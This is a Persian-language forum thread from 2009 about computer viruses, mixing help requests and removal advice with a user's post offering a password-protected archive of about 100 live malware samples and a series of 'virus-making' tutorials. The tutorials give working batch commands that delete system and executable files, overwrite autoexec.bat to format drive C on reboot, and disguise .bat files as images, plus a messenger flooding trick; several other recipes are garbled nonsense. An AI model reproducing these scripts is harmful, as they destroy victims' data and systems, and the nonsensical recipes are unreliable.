Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.VB.akp
Trojan-Downloader.Win32.Banload.TN
Trojan-Downloader.Win32.Delf.TU
Trojan-Downloader.Win32.Agent.dkf
Packed.Win32.Klone.af
Backdoor.Win32.EggDrop
Virus.Win32.Agent.KWT
Trojan-PWS.Win32.Small.br
Trojan-Proxy.Win32.Horst.aae
Virus.Win32.Alhel
Virus.Win32.Trojan
Trojan-PWS.Win32.Small.br
Trojan-Spy.Win32.Delf.PG
Trojan-PWS.Win32.Small.br
Win32.SuspectCrc
Trojan.Win32.VB.sj
Backdoor.Win32.Rbot.bnn
Backdoor.Win32.Hupigon
IM-Worm.Win32.Sumom.C
Trojan-Spy.Win32.Banker.ahy
Trojan.Agent.BTL
Trojan-Downloader.Win32.Agent.eup
Trojan.Win32.VB.bji
Virus.Win32.Baidubar.B
Virus.Win32.Visel.E
Trojan-Downloader.Azm.INI
Worm.Win32.VB.ge
Trojan-Downloader.Win32.Zlob.and
Virus.Win32.Killreg.F
Backdoor.Win32.Agent.cwm
Trojan-PWS.Win32.Small.br
Virus.Win32.Baidubar.B
Trojan.Win32.Zapchast.dq
Trojan-Spy.Win32.Banker.JU
Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.PcClient.zn
Virus.Win32.Delf.GAJ
Virus.Win32.Agent.IWX
TR/Drop.Agent.bjl.4
SPR/Agent.ZA.1
TR/Spy.258081
TR/Dldr.Agent.155648.1
WORM/Sumom.C.22
SPR/PSW.TenyQQ
Win32/TrojanDownloader.Adload.NEP
Win32/IRCBot trojan

urc
27-03-2009, 14:31
هر گونه مشکلات ویروسی شما را جواب می دهم
urc

urc
27-03-2009, 16:17
آنتی ویروس خود را با 100 نوع ویروس واقعی آزمایش کنید !!!

خیلی از شما تا بحال تست آنتی ویروسها را که در سایت های مختلف گذاشته شده اند دیده اید. اما هیچ اطلاعی
از اینکه این آنتی ویروسها واقعا چه نوع فایل هایی رو اسکن میکنند ندارید و یا اینکه چه نمونه هایی رو در آزمایش
آنتی ویروسها بکار بردند.

من در اینجا فایلی را قرار میدهم که با مسئولیت خودتان آن را دانلود کرده و آنتی ویروس خود را آزمایش کنید. این فایل
فشرده شده جهت اطمینان بهش پسورد داده شده تا کسی کار اشتباهی رو انجام نده. این فایل فشرده شده دارای
100 نوع از خطرناکترین و مشهورترین ویروسها و تروجانهای 1 الی 2 ماه گذشته هستند که در تمام دنیا پخش شده اند

خیلی از این ویروسها مانند Hupigon تغییر شکل میدهند و هر روز یک نوع جدید از این ویروس در اینترنت پخش میشود
متاسفانه خیلی از آنتی ویروسها حتی 50 درصد این 100 تا فایل آلوده را هم نمیتوانند تشخیص دهند. چون این ویروس
ها و تروجانها همگی از دنیای واقعی اینترنت صید شده اند پس وقتی آنتی ویروسها را با این نمونه ها تست میکنید
باید بدونید که در دنیای واقعی آنتی ویروس شما چطور عمل میکنه.

نتیجه گیری و تصمیم بر اینکه کدام آنتی ویروس خوب عمل میکنه یا بد رو به عهده خودتون میگذارم چون من این فایل
رو فقط جهت آزمایش قرار میدم و هیچ منظور و قصد دیگه ای از قرار دادن این فایل در اینجا ندارم. پس لطفا هر کسی
آنتی ویروس خودش رو با توضیحاتی که در پایین میدم تست بکنه و نتیجه اون رو در این تایپک قرار بده چون دونستن این
نتیجه ها برای خیلی ها میتونه قابل توجه باشه.

فایل فشرده شده و Rar شده زیر اسمش 100_Virus_For_Test است و پسورد اون هم 100pass. برای اینکه
امنیت بیشتری رعایت بشه یک فایل فشرده شده دیگه بصورت rar در داخل فایل فشرده شده بالا قرار داره.
یعنی 2 نوع فایل rar در داخل هم فشرده شده. برای باز کردن فایل اولی پسورد 100pass رو وارد میکنید و فایل
فشرده شده ای که از توش خارج میشه رو با آنتی ویروستون اسکن میکنید.

توجه داشته باشید که فایل فشرده شده دوم را به هیچ عنوان Extract نکنید بلکه فقط اون رو توسط آنتی
ویروستون اسکن کنید و نتیجه اون رو در اینجا قرار بدید.

پس شما طبق شیوه زیر عمل میکنید.
1. فایل را از لینکی که در زیر قرار میدم دانلود میکنید. دانلودش که تمام شد بر روی اون فایل
کلیک راست میکنید و دقیقا مثل عکس زیر عبارتی رو که در زیر نشون دادم انتخاب میکنید تا
اون فایل از حالت فشرده در بیاد.



3. همان طور که در عکس بالا میبینید اگر زمانی که شما پسورد را بزنید و اوکی را بزنید هیچ
اتفاقی نمی افتند فقط فایل 100pass.rar از داخل فایل فشرده اولی در میاد و در داخل یک
پوشه دیگه قرار میگیره.



تاکید میکنم که فایل 100pass.rar رو از حالت فشرده خارج نکنید و هرگز سعی نکنید اون رو
باز کنید و بر روی فایل هایی که در د اخلش قرار داره کلیک کنید. در غیر این صورت ویروس و یا
تروجان در سیستم شما فعال شده و سیستمتون آلوده میشه.

این 100 ویروس و تروجان از خطرناکترین نوع خودشون هستند که در 100 نمونه جدا در این
فایل جمع آوری شدند و این فایل فقط و صرفا بخاطر آزمایش آنتی ویروسها با دنیای واقعی
است.

برای دانلود فایل میتونید یکی از لینک های زیر را برای دانلود انتخاب کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
اسم بعضی از نمونه هایی که در این فایل وجود دارند را در زیر میتونید مشاهده کنید.

MalwareScope.Backdoor.Hupigon
Packed.Win32.Klone.af
Trojan-Spy.Win32.Banker.to
Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.VB.akp
Trojan-Downloader.Win32.Banload.TN
Trojan-Downloader.Win32.Delf.TU
Trojan-Downloader.Win32.Agent.dkf
Packed.Win32.Klone.af
Backdoor.Win32.EggDrop
Virus.Win32.Agent.KWT
Trojan-PWS.Win32.Small.br
Trojan-Proxy.Win32.Horst.aae
Virus.Win32.Alhel
Virus.Win32.Trojan
Trojan-PWS.Win32.Small.br
Trojan-Spy.Win32.Delf.PG
Trojan-PWS.Win32.Small.br
Win32.SuspectCrc
Trojan.Win32.VB.sj
Backdoor.Win32.Rbot.bnn
Backdoor.Win32.Hupigon
IM-Worm.Win32.Sumom.C
Trojan-Spy.Win32.Banker.ahy
Trojan.Agent.BTL
Trojan-Downloader.Win32.Agent.eup
Trojan.Win32.VB.bji
Virus.Win32.Baidubar.B
Virus.Win32.Visel.E
Trojan-Downloader.Azm.INI
Worm.Win32.VB.ge
Trojan-Downloader.Win32.Zlob.and
Virus.Win32.Killreg.F
Backdoor.Win32.Agent.cwm
Trojan-PWS.Win32.Small.br
Virus.Win32.Baidubar.B
Trojan.Win32.Zapchast.dq
Trojan-Spy.Win32.Banker.JU
Trojan-Spy.Win32.Banker.ahy
Backdoor.Win32.PcClient.zn
Virus.Win32.Delf.GAJ
Virus.Win32.Agent.IWX
TR/Drop.Agent.bjl.4
SPR/Agent.ZA.1
TR/Spy.258081
TR/Dldr.Agent.155648.1
WORM/Sumom.C.22
SPR/PSW.TenyQQ
Win32/TrojanDownloader.Adload.NEP

didar11
27-03-2009, 16:43
با سلام
مدتی است سیستم بنده هنگام دبل کلیک صدای نابهنجاری می دهد. هر کاری که کردم این مشکل برطف نشد.
با عوض کردن پیش فرض ها در قسمت sounds and audio devices کنترل پنل نیز هیچ تغییری ایجاد نشد.
لطفا مرا راهنمایی کنید.
با تشکر

urc
27-03-2009, 17:34
این هفته شاهد آلوده شدن کامپیوتر بسیاری از دوستانم به یک ویروس جدید بودم. ویروس «ستایش» که با نام های Day of Judgmet و Antichrist هم شناخته می شود یک کرم ایرانی است که سیستم عامل های ویندوز ۳۲ بیتی را مورد حمله قرار می دهد.از مشخصه های بارز این کرم می توان به موارد زیر اشاره کرد:
غیرفعال کردن Folder Option
باز شدن صفحه اینترنتی با عنوان Day of Judgment (به معنی روز داوری) که ترجمه انگلیسی سوره حمد بر روی پس زمینه سبز در آن مشاهده می شود.این صفحه در هر بار بوت شدن ویندوز به شما نشان داده می شود.همچنین در هر بار بوت شدن ویندوز پنجره ای با تیتر Antichrist و با محتوای Day of Judgment نمایش داده می شود.بر طبق آنچه که در اینجا نوشته شده جلوی اجرای Regedit و Task Manager با آلوده شدن توسط این ویروس گرفته می شود اما من در سیستم مختلف چنین مشکلی را نداشتم. سرعت کلی سیستم به شدت پایین می آید و در فهرست پروسس های ویندوز می توانید Sys.exe و در قسمت برنامه های startup نام wma.exe و blank.htm را مشاهده کنید. بدیهی است که پاک کردن این برنامه ها و یا متوقف کردن پروسس مذکور موجب برطرف شدن مشکل نمی شود!
همچنین ویروس خود را در تمام درایوها با نام Autoplay.exe کپی می کند که باز کردن درایو با دابل کلیک مانند گذاردن پا بر روی مین و انفجار آن ، کل سیستم را دوباره آلوده می نماید.
روش از بین بردن:
متاسفانه حتی نسخه های بروزشده آنتی ویروس Eset NOD32 (نسخه ۲ و ۳ آزمایش شدند) قادر به شناسایی و خنثی نمودن این ویروس نمی باشند.اما حداقل سه آنتی ویروس Kaspersky (در نسخه ۷ آزمایش شد) ، McAfee (نسخه ۲۰۰۸) و احتمالا آخرین نگارش ضدویروس سیمانتک (به نقل از سایت امنیتی دمسان) قادر به شناسایی و پاک کردن ویروس مذکور هستند.برای پاک کردن این ویروس ابتدا آنتی ویروس خودتان را به آخرین بسته های بروزرسانی مجهز کنید سپس اقدام به کنترل سیستم نمایید.توصیه اکید می کنم که تمام هارد را برای یافتن ویروس اسکن نمایید و همچنین از کنترل حافظه (Memory ) غافل نشوید.بعد از پاک شدن ویروس ، این فایل را که کلیه اثرات مخرب به جا مانده از ویروس مثل پنهان شدن FolderOption و نظیر آن را اصلاح می کند را از اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و یا اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) دانلود کرده و اجرا کنید.پس از آنکه اثرات مخرب از بین رفت ، نمایش فایل های پنهان شده را از FolderOption انتخاب کنید و به سراغ تمام درایوها بروید (از دابل کلیک برای بازکردن درایو پرهیز کنید) و فایل مخفی شده ی autoplay.exe را پاک کنید.
با آرزوی آنکه مشکلات بوجود آمده حل شده و ویندوز به حالت اولیه خود برگردد.اطلاعات بیشتر در مورد این کرم را در اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ببینید

urc
27-03-2009, 17:36
این هفته شاهد آلوده شدن کامپیوتر بسیاری از دوستانم به یک ویروس جدید بودم. ویروس «ستایش» که با نام های Day of Judgmet و Antichrist هم شناخته می شود یک کرم ایرانی است که سیستم عامل های ویندوز ۳۲ بیتی را مورد حمله قرار می دهد.از مشخصه های بارز این کرم می توان به موارد زیر اشاره کرد:
غیرفعال کردن Folder Option
باز شدن صفحه اینترنتی با عنوان Day of Judgment (به معنی روز داوری) که ترجمه انگلیسی سوره حمد بر روی پس زمینه سبز در آن مشاهده می شود.این صفحه در هر بار بوت شدن ویندوز به شما نشان داده می شود.همچنین در هر بار بوت شدن ویندوز پنجره ای با تیتر Antichrist و با محتوای Day of Judgment نمایش داده می شود.بر طبق آنچه که در اینجا نوشته شده جلوی اجرای Regedit و Task Manager با آلوده شدن توسط این ویروس گرفته می شود اما من در سیستم مختلف چنین مشکلی را نداشتم. سرعت کلی سیستم به شدت پایین می آید و در فهرست پروسس های ویندوز می توانید Sys.exe و در قسمت برنامه های startup نام wma.exe و blank.htm را مشاهده کنید. بدیهی است که پاک کردن این برنامه ها و یا متوقف کردن پروسس مذکور موجب برطرف شدن مشکل نمی شود!
همچنین ویروس خود را در تمام درایوها با نام Autoplay.exe کپی می کند که باز کردن درایو با دابل کلیک مانند گذاردن پا بر روی مین و انفجار آن ، کل سیستم را دوباره آلوده می نماید.
روش از بین بردن:
متاسفانه حتی نسخه های بروزشده آنتی ویروس Eset NOD32 (نسخه ۲ و ۳ آزمایش شدند) قادر به شناسایی و خنثی نمودن این ویروس نمی باشند.اما حداقل سه آنتی ویروس Kaspersky (در نسخه ۷ آزمایش شد) ، McAfee (نسخه ۲۰۰۸) و احتمالا آخرین نگارش ضدویروس سیمانتک (به نقل از سایت امنیتی دمسان) قادر به شناسایی و پاک کردن ویروس مذکور هستند.برای پاک کردن این ویروس ابتدا آنتی ویروس خودتان را به آخرین بسته های بروزرسانی مجهز کنید سپس اقدام به کنترل سیستم نمایید.توصیه اکید می کنم که تمام هارد را برای یافتن ویروس اسکن نمایید و همچنین از کنترل حافظه (Memory ) غافل نشوید.بعد از پاک شدن ویروس ، این فایل را که کلیه اثرات مخرب به جا مانده از ویروس مثل پنهان شدن FolderOption و نظیر آن را اصلاح می کند را از اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و یا اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) دانلود کرده و اجرا کنید.پس از آنکه اثرات مخرب از بین رفت ، نمایش فایل های پنهان شده را از FolderOption انتخاب کنید و به سراغ تمام درایوها بروید (از دابل کلیک برای بازکردن درایو پرهیز کنید) و فایل مخفی شده ی autoplay.exe را پاک کنید.
با آرزوی آنکه مشکلات بوجود آمده حل شده و ویندوز به حالت اولیه خود برگردد.اطلاعات بیشتر در مورد این کرم را در اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ببینید

omid-p30
27-03-2009, 19:26
urc جان بهتره برای اینکه نظم و چهره تاپیک به هم نخوره با فونت معمولی پست هاتو قرار بدی و هر پست رو هم بیشتر از یک بار نفرستی.

ahivid
28-03-2009, 09:48
سلام
از تاپیکت متشکرم
ولی من اوتوران هارو پاک کردم ولی هنوز گزینه show hiden در folder option کار نمی کند و دوباره به حالت قبل می رود
لطفا جواب دهید
با تشکر

urc
28-03-2009, 10:09
شرمنده ببخشید

urc
28-03-2009, 10:13
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

urc
28-03-2009, 10:25
در مورد ویروس ها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

این ویروس ها بر روی هر کامپیوتری که آن را اجرا کند عمل میکند و دوست و غریبه هم نمی شناسد در مورد تبدیل ویروس به فایل دیگر هم برنامه هایی وجود دارد که یک ویروس میسازد و به فایل عکس تبدیل میکند یک ترفند کوچک برای مخفی کردن پسوند bat. ویروس ها این است که در قسمتی که اسم ویروس را مینویسید اسم مورد نظر را نوشته و به آن پسوند jpg. و بعد از آن 25 بار اسپیس را زده و به آن پسوند bat. بدهید مثل
virus.jpg ... .bat که (...) نشانه ی 25 اسپیس هست ((نظر هم بدهید))



جای notepad ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

به قسمت start بروید و allprpgrams را انتخواب کنید accessories رفته و در گزینه ها notepad را انتخواب کنید ((نظر هم بدید))

[/URL]

لطفا در صورت استفاده از آموزش های وبلاگ نظر خود را بنویسید و اگر سوالی دارید در قسمت نظرات بنویسید و هر چیزی را که میخواهید بگویید تا بگذارم




[U]ساخت یک ویروس برای سوزاندن مادر بورد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : این ویروس در صورت اجرا کامپیوتر فرد را به کلی خراب میکند طرز ساخت: note pad خود را باز کرده و کد پاین


@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========
رادر آن کپی و پست کنید بعد به منوی فایل رفته وسیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل xxx.bat توجه (( خط فاصله ها هم جزو کد هستند ))





ویروس برای سوزاندن cpu ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : طرز ساخت: note pad خود را باز کنید سپس کد cpu_567hjkblaster را در آن کپی و پست کنید از منوی فایل سیو از را انتخواب کنید و در filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل cpu.bat




ویروس برای سوزاندن هارد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : طرز ساخت : note pad خود را باز کرده و کد debug e30 o31 را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat و آن را ذخیره کنید




سرعت بالا آمدن ویندوز خود را زیاد کنی ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] راستش یه فولدری رو تو پوشه ویندوز پیدا کردم که اگر محتویات داخل آن را پاک کنید ویندوز زودتر بالا می آید
این هم مسیر پوشه:به فرض اگه ویندوز تو درایو c باشه
C:\WINDOWS\Prefetch
هه شو پاک کنید




ویروس ----- گذار ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : توضیح درباره ویروس : این ویروس در internet explore ----- گذاری میکنه و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت . طرز ساخت : note pad خود را باز کرده و کدی را که نوشته شده است pouped-blocked-web-exploure-online&offline را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر خود را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat بعد هم فایل را ذخیره کنید




ویروس برای رسیت و بالا نیامدن ویندوز ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس به منوی فایل رفته و سیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat




ساخت یک ویروس کوچک برای فرمت کردن یک درایو مشخص ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:


@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.





بوت کردن در یاهو 7 بدون نیاز به برنامه ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] یاهو مسنجر را باز کنید در گزینه های بالا روی im کلیک کنید بعد از باز شدن به پوشه ی دوم بروید و id مورد نظر را نوشته و بعد از آن دوتا ++بزنید مثل ++thebesthacker بعد ok کنید بعدصفحه ای باز میشود مانند صفحه ی چت بعد 10 تا L در این صفحه و 10 L در صفحه ای که با فردی که id آن بدون ++ نوشته اید و در حال چت هستید بروید و10 L در آنجا نوشته و بفرستید این کار باید 4 یا 5 بار تکرار شود نکته:برای نوشتن 10 L هر L را جدا گانه بنویسید (( L بعد اینتر _ L بعد اینتر و...)) بعد از این کار 50_60 صفحه در کامپیوتر فرد باز میشود و فرد دیسکانکت میشود توجه داشته باشید که یاهو شما و فرد مقابل باید 7 باشد




ویروس بلستر ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : این ویروس در صورت اجرا شدن کامپیوتر فرد را restart میکند طرز ساختن ویروس: note pad را باز کرده و کد shotdown -a را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل blester.bat




ویروس برای پر کردن هارد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : این ویروس هارد را پر میکند و دیگر هیچ بازی و برنامه ای نصب نمیشود طرز ساخت ویروس: note pad خود را باز کرده و کد c/windows/system32/jefo/display/memory/full را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید و در قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل memory.bat بعد ذخیره کنید








ساخت ویروس ficker ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] آموزش ساخت ویروس : این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد


Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"

توسطURC

urc
28-03-2009, 13:26
اگر کسی ویروس کظم غیظ گرفته .....بگه بهترین راه حل پاک شدنشو بگذارم ...اگر هم خواستید اموزش ویروس نویسی با ویژال بیسیک را می گذارم

urc
28-03-2009, 14:22
بازگردانی سریع فایلهای مخفی شده ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
این هم روشی برای کسانی که می خواهند به سرعت به فایلهای مخفی خودشون دسترسی پیدا کنند .
برای این کار کافی است دستورات زیر را داخل Notepad کپی کنید و بعد ان را با نام و پسوند new.bat ذخیره کنید و بعد ان را اجرا کنید . چند لحظه منتظر بمانید تا فایلهای مخفی نمایان شوند .
تذکر : با این روش فایلهای سوپر هایدن نیز قابل روئیت خواهند بود .

<!--[if !supportLineBreakNewLine]-->
<!--[endif]-->
کد:
attrib -s -h C:\*.* /s /d
attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d

urc
28-03-2009, 14:26
این ویروسی که باعث عدم نمایش فایل های مخفی میشه و باعث میشه درایوها تو یه پنجره دیگه باز بشن رو چطور میشه پاک کرد؟

بازگردانی سریع فایلهای مخفی شده ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
این هم روشی برای کسانی که می خواهند به سرعت به فایلهای مخفی خودشون دسترسی پیدا کنند .
برای این کار کافی است دستورات زیر را داخل Notepad کپی کنید و بعد ان را با نام و پسوند new.bat ذخیره کنید و بعد ان را اجرا کنید . چند لحظه منتظر بمانید تا فایلهای مخفی نمایان شوند .
تذکر : با این روش فایلهای سوپر هایدن نیز قابل روئیت خواهند بود .

<!--[if !supportLineBreakNewLine]-->
<!--[endif]-->
کد:
attrib -s -h C:\*.* /s /d
attrib -s -h d:\*.* /s /d
attrib -s -h E:\*.* /s /d
attrib -s -h f:\*.* /s /d
attrib -s -h g:\*.* /s /d
attrib -s -h h:\*.* /s /d

didar11
28-03-2009, 17:11
با سلام
مدتی است سیستم بنده هنگام دبل کلیک صدای نابهنجاری می دهد. هر کاری که کردم این مشکل برطف نشد.
با عوض کردن پیش فرض ها در قسمت sounds and audio devices کنترل پنل نیز هیچ تغییری ایجاد نشد.
لطفا مرا راهنمایی کنید.
با تشکر
کسی نیست مرا راهنمایی بکنه؟
البته باید اضافه کنم این ویروس گاهی غیر فعال می شود و اما دوباره شروع بکار می کند بدون اینکه بنده کار خاصی رو انجام بدهم.
با عوض کردن ویندوز و استفاده از آنتی ویروس اویرا و کاسپراسکای هم مشکلم برطرف نشد لطفا مرا راهنمایی بکنید؟

SajjadKAZ2003
28-03-2009, 22:07
هر گونه مشکلات ویروسی شما را جواب می دهم
urc

مشکل من اینه :
به محض اینکه فلش دیسک رو به کامپیوتر متصل می کنم یه فایل به اسم autorun.inf و یه فولدر به اسم RECYCLER که درونش فایل jwgkvsq.vmx هست تولید میشه

تو هاردم مشکلی از این بابت ندارم فقط به محض اینکه فلش دیسک رو وصل می کنم این فایلها در فلش دیسک تولید میشه

این ویروس در ویندوز طوری مخفی میشه که خیلی از آنتی ویروسها اون رو نمیشناسن و کارش اینه که به محض وصل کردن فلش دیسک این فایلها رو در فلش دیسک ایجاد میکنه

دنبال راه چاره برای از بین بردن این ویروس هستم

sub_coder
29-03-2009, 01:09
p>================================================== =============</p>


پاک کردن برنامه ی مخربی که پوشه ها را مخفی ( Super Hidden ) می کند


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

نام دقیق این برنامه ی مخرب Trojan.Win32.Delf.aam است .

با زبان برنامه نویسی Borland Delphi نوشته شده .

آی...... این Malware * مانند کرم های New Folder.exe و BronTok.A شبیه آی...... یک پوشه است !
بنابراین به سرعت منتشر می شود .

این برنامه ی مخرب تمام پوشه های Open شده توسط قربانی را Super Hidden می کند و یک نسخه از خودش را با همان نام در همان مـسـیـر کـپـی می کـنـد کـه اگـر Victim * آن را اجرا کـنـد هم Malware اجرا می شـود و هم محـتـوی پوشـه ی Super Hidden نمایـش داده می شود !!

یعنی اگه Victim مبتدی باشه به زودی متوجه نمیشه که چه بلایی داره سر پوشه هاش میاد !

هــمــانــطـــور کـه می دانـیــد برای آشـکار کـردن فایـل ها و پوشـه های Super Hidden باید ابتدا در Folder Options\View روی گزینه ی Show hidden files and folders کلیک کنید و پس از آن تیک گزینه ی (Hide protected operating system files (Recommended را بردارید و به پیغام امنیتی پاسخ مثبت و شستی OK را فشار دهید .

این Malware به Victim اجازه ی آشکار کردن پوشه ها و فایل های Super Hidden را نمی دهد !

ضمنا Registry Tools ، Windows Task Manager و Folder Options را Disable نمی کند .

پر واضح است که این برنامه ی مخرب از آشکار کردن پسوند فایل ها هم جلوگیری می کنه !

برای پاک کردن این ویروس می توانید از برنامه ای که نوشتم استفاده کنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] om%2FPrograms%2FAnti%2520T.Delf.aam.7z)



با سلام======این برنامه هجرا نمیشه وقتی که دابل می زنی تسک بار قفل میشه ؟؟؟؟

urc
29-03-2009, 11:26
مشکل من اینه :
به محض اینکه فلش دیسک رو به کامپیوتر متصل می کنم یه فایل به اسم autorun.inf و یه فولدر به اسم RECYCLER که درونش فایل jwgkvsq.vmx هست تولید میشه

تو هاردم مشکلی از این بابت ندارم فقط به محض اینکه فلش دیسک رو وصل می کنم این فایلها در فلش دیسک تولید میشه

این ویروس در ویندوز طوری مخفی میشه که خیلی از آنتی ویروسها اون رو نمیشناسن و کارش اینه که به محض وصل کردن فلش دیسک این فایلها رو در فلش دیسک ایجاد میکنه

دنبال راه چاره برای از بین بردن این ویروس هستم
نحوه از ببن بردن ویروس autorun.inf ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

مواقعی که شما وسایلی مانند USB, flash drive را به کامپیوتر وصل می کنید ویروس اتوران وارد سیستم شما می شود . به دلیل این که ویروس autorun.inf به صورت hidden و سیستمی می باشد به همین دلیل اکثر انتی ویروس ها قادر به شناسایی و از بین بردن این ویروس نیستند .

